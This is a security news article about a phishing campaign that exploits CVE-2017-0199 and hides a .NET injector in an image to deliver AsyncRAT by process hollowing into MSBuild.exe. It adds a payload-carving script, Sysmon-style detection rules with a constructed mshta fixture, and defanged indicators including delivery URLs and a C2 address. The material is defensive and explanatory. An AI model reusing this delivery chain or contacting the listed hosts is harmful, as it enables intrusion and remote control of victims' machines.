Monday, May 12, 2025

New Steganography Campaign Exploits MS Office Vulnerability to Distribute AsyncRAT


A recently uncovered cyberattack campaign has brought steganography back into the spotlight, showcasing the creative and insidious methods attackers employ to deliver malware.

This operation, dubbed the “Stego-Campaign,” exploits a long-patched Microsoft Office vulnerability, CVE-2017-0199, to gain initial execution and ultimately deploys the AsyncRAT remote access trojan.

Innovative Attack Leverages Hidden Payloads in Images

The vulnerability, disclosed and patched in April 2017, gives remote code execution (RCE) as soon as the victim opens a crafted document: an embedded OLE object pulls a remote HTA file and Office hands it to mshta.exe without any further prompt, which makes it a reliable entry point for phishing-based attacks that still works wherever the patch is missing.


The attack begins with a phishing email containing a malicious Microsoft Office document that exploits CVE-2017-0199.

Figure: Stego-Campaign infection flow

Once opened, the document triggers the download of a malicious HTA script, which in turn fetches a trojanized copy of Prnport.vbs, a legitimate Windows administration script (shipped under System32\Printing_Admin_Scripts) for managing printer ports.

This tampered script constructs and executes a PowerShell command to download an injector DLL hidden within an innocuous-looking image file using steganography.

Sophisticated Payload Delivery via Trojanized Scripts and Process Hollowing

The injector is stored as a Base64 string placed between two marker strings inside the image file; the image still renders normally, and the payload can be carved out and decoded with a tool such as CyberChef (extract the text between the markers, then From Base64).

The decoded injector is a 32-bit .NET DLL whose namespace, Microsoft.Win32.TaskScheduler, borrows the name of a legitimate library to look benign; the architecture and format were confirmed with Detect It Easy and CFF Explorer.

The PowerShell script loads this injector in memory via .NET reflection, so the DLL never has to be written to disk, and invokes a method named “VAI” to obtain the URL of the final stage. That URL serves the AsyncRAT binary as a Base64 string that has additionally been reversed.

Once decoded, the binary is injected into a legitimate MSBuild.exe process by process hollowing (MITRE ATT&CK T1055.012): the injector starts MSBuild.exe in a suspended state, replaces its in-memory image with AsyncRAT, and resumes the thread, so the malware runs under a trusted, Microsoft-signed process name.

Figure: The process hollowing flow used in this attack

AsyncRAT, an open-source remote access tool released in 2019, provides attackers with capabilities like remote desktop access, keylogging, and the ability to deploy additional malware such as ransomware.

This campaign’s use of steganography to conceal malicious code within images exemplifies the lengths to which threat actors go to evade detection.

In summary: after VAI returns the delivery URL, the PowerShell script fetches the text hosted there, reverses the string, Base64-decodes it into the AsyncRAT executable, and hands the bytes to the hollowing routine so that nothing but the image and the text file ever crosses the network in recognisable form.
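The two decoding steps above (carving the Base64 injector out of the carrier image, and reversing then Base64-decoding the final stage) are what an analyst reproduces in CyberChef. The script below is an added example, not code from the campaign or from the original write-up; it assumes marker strings of its own (the page does not name the real ones) and runs on constructed sample bytes, and it checks that each recovered blob is a PE file before treating it as a stage.

```python
"""Recover the two staged payloads from their wrappers.

Added example (not the campaign's or the article's code). Assumptions:
- START_MARKER / END_MARKER are hypothetical; the real markers are not on the page.
- SAMPLE_IMAGE and SAMPLE_STAGE_TEXT are constructed here, not captured samples.
"""
import base64
import re

# Hypothetical markers that bracket the Base64 injector inside the image.
START_MARKER = b"<<BASE64_START>>"
END_MARKER = b"<<BASE64_END>>"


def extract_between_markers(blob: bytes, start: bytes = START_MARKER,
                            end: bytes = END_MARKER) -> bytes:
    """Carve the Base64 text between the two markers and decode it."""
    pattern = re.escape(start) + rb"(.*?)" + re.escape(end)
    match = re.search(pattern, blob, re.DOTALL)
    if match is None:
        raise ValueError("payload markers not found in carrier file")
    b64 = re.sub(rb"\s+", b"", match.group(1))  # tolerate line breaks in the blob
    return base64.b64decode(b64, validate=True)


def decode_reversed_base64(text: bytes) -> bytes:
    """Undo the 'Base64 then reverse the string' wrapping of the final stage."""
    return base64.b64decode(text.strip()[::-1], validate=True)


def is_pe(data: bytes) -> bool:
    """Cheap sanity check: 'MZ' DOS header and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_fake_pe(tag: bytes) -> bytes:
    """Constructed stand-in for a PE file: valid MZ/PE headers, no real code."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + e_lfanew.to_bytes(4, "little")
    return dos_header + b"PE\0\0" + tag  # dos_header is exactly 0x40 bytes long


# Constructed carrier: JPEG-like prefix, marker-wrapped Base64 injector, trailer.
FAKE_INJECTOR = build_fake_pe(b"injector-dll")
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0" + b"\x00" * 16
                + START_MARKER + base64.b64encode(FAKE_INJECTOR) + END_MARKER
                + b"\xff\xd9")

# Constructed stand-in for what the delivery URL returns: Base64, string reversed.
FAKE_ASYNCRAT = build_fake_pe(b"final-stage")
SAMPLE_STAGE_TEXT = base64.b64encode(FAKE_ASYNCRAT)[::-1]


def recover_stages(image: bytes, stage_text: bytes) -> dict:
    """Run both decoders and report whether each result looks like a PE."""
    injector = extract_between_markers(image)
    final = decode_reversed_base64(stage_text)
    return {
        "injector": injector, "injector_is_pe": is_pe(injector),
        "final": final, "final_is_pe": is_pe(final),
    }


if __name__ == "__main__":
    result = recover_stages(SAMPLE_IMAGE, SAMPLE_STAGE_TEXT)
    print("injector PE:", result["injector_is_pe"], "final PE:", result["final_is_pe"])
```

On a real sample, replace the markers with the strings found by eyeballing the image in a hex editor, and feed the recovered DLL to a .NET decompiler rather than running it; the `validate=True` flag makes a wrong marker guess fail loudly instead of decoding garbage.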

The final payload is already detected on VirusTotal, and its embedded configuration reveals the command-and-control (C2) address listed in the indicators below.

Steganographic loaders are not common in commodity campaigns, but they sidestep file-based scanning of the carrier: the image is a valid image, and the malicious code exists only as a blob of text inside it until a script carves it out, so it is hard to detect without specialized analysis.

Defenders should study attack flows like this one and focus on phishing prevention (including blocking remote OLE/HTA execution from Office), endpoint monitoring for suspicious process lineage such as an Office application spawning mshta.exe, a script host running a copy of Prnport.vbs from a user-writable path, or PowerShell launching MSBuild.exe with no project file, and anomaly detection in network traffic, for example MSBuild.exe reaching out to an external host.
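The lineage and network heuristics from the paragraph above, run over constructed Sysmon-style events, as an added example that is not part of the original article or any vendor's rule set. Field names follow Sysmon (EventID 1 process creation, EventID 3 network connection) but every value is invented for the demo; the "normal" parent-process and script-path assumptions are the author's, and the rule names are arbitrary.

```python
"""Detection heuristics for the Stego-Campaign execution chain.

Added example, not from the original write-up. Events are constructed;
the process IDs, paths and 203.0.113.10 (documentation range) are invented.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Assumption: the only legitimate home of prnport.vbs (locale subfolders included).
LEGIT_PRNPORT_DIR = str(PureWindowsPath(r"C:\Windows\System32\Printing_Admin_Scripts")).lower()
PRNPORT_RE = re.compile(r'([A-Za-z]:\\[^"\s]*?prnport\.vbs)', re.I)
PROJECT_RE = re.compile(r"\.(?:csproj|vbproj|fsproj|proj|sln)\b", re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_process_create(ev: dict) -> list:
    """Rules for Sysmon EventID 1 records; returns the names of rules that fired."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and parent in OFFICE_APPS:
        hits.append("office_spawns_mshta")            # CVE-2017-0199 style HTA stage
    if image in {"wscript.exe", "cscript.exe"} and "prnport.vbs" in cmd.lower():
        m = PRNPORT_RE.search(cmd)
        script = m.group(1).lower() if m else ""
        if not script.startswith(LEGIT_PRNPORT_DIR):
            hits.append("prnport_vbs_outside_admin_scripts")  # trojanized copy
    if image == "msbuild.exe":
        if parent in SCRIPT_HOSTS:
            hits.append("msbuild_spawned_by_script_host")
        if not PROJECT_RE.search(cmd):
            # A hollowing target is created with a bare command line (heuristic).
            hits.append("msbuild_without_project_file")
    return hits


def check_network(ev: dict) -> list:
    """Rules for Sysmon EventID 3 records."""
    return ["msbuild_network_connection"] if _basename(ev["Image"]) == "msbuild.exe" else []


def evaluate(events: list) -> list:
    """Return (rule, ProcessId) pairs for every rule that fired."""
    alerts = []
    for ev in events:
        hits = check_process_create(ev) if ev["EventID"] == 1 else (
            check_network(ev) if ev["EventID"] == 3 else [])
        alerts.extend((h, ev["ProcessId"]) for h in hits)
    return alerts


MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
# Constructed events: the malicious chain (pids 5001-5005) plus one benign build (7001).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 5001, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "WINWORD.EXE invoice.doc"},
    {"EventID": 1, "ProcessId": 5002, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe https://example.invalid/stage.hta"},
    {"EventID": 1, "ProcessId": 5003, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'wscript.exe "C:\Users\victim\AppData\Roaming\prnport.vbs"'},
    {"EventID": 1, "ProcessId": 5004, "Image": MSBUILD,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f'"{MSBUILD}"'},
    {"EventID": 3, "ProcessId": 5004, "Image": MSBUILD, "DestinationIp": "203.0.113.10"},
    {"EventID": 1, "ProcessId": 7001, "Image": MSBUILD,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": f'"{MSBUILD}" C:\\src\\App\\App.csproj /t:Build'},
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:40} pid={pid}")
```

None of these rules is a conviction on its own; a developer box will occasionally trip the MSBuild rules. The value is in correlation: the same host producing the Office-to-mshta edge, a prnport.vbs copy outside Printing_Admin_Scripts, and a script-host-spawned MSBuild.exe with a network connection within a few minutes is the whole chain described above.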

Indicators of Compromise (IOC)

Type                             Value
Trojanized Prnport.vbs (SHA256)  1105ae14ccb41fedcf556e4c575e34e505e9a571f2021ba89a75fbe5fa12e3c0
AsyncRAT delivery URL            hxxps[://]watchonlinehotvideos[.]site/001[.]txt
AsyncRAT (SHA256)                448ae5b8890c17a2efe49856531efd62796db52d2ff0ecbb4678334aea2bf776
AsyncRAT C2 address              148[.]113[.]214[.]176
Injector delivery URL            hxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb
Injector (namespace)             Microsoft.Win32.TaskScheduler
Injector binary (SHA256)         8CC93827CA7652AFC8E08B9266F6567D06B932AF26B601EB7FDE10F5E5A6CB30
Injected process path            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
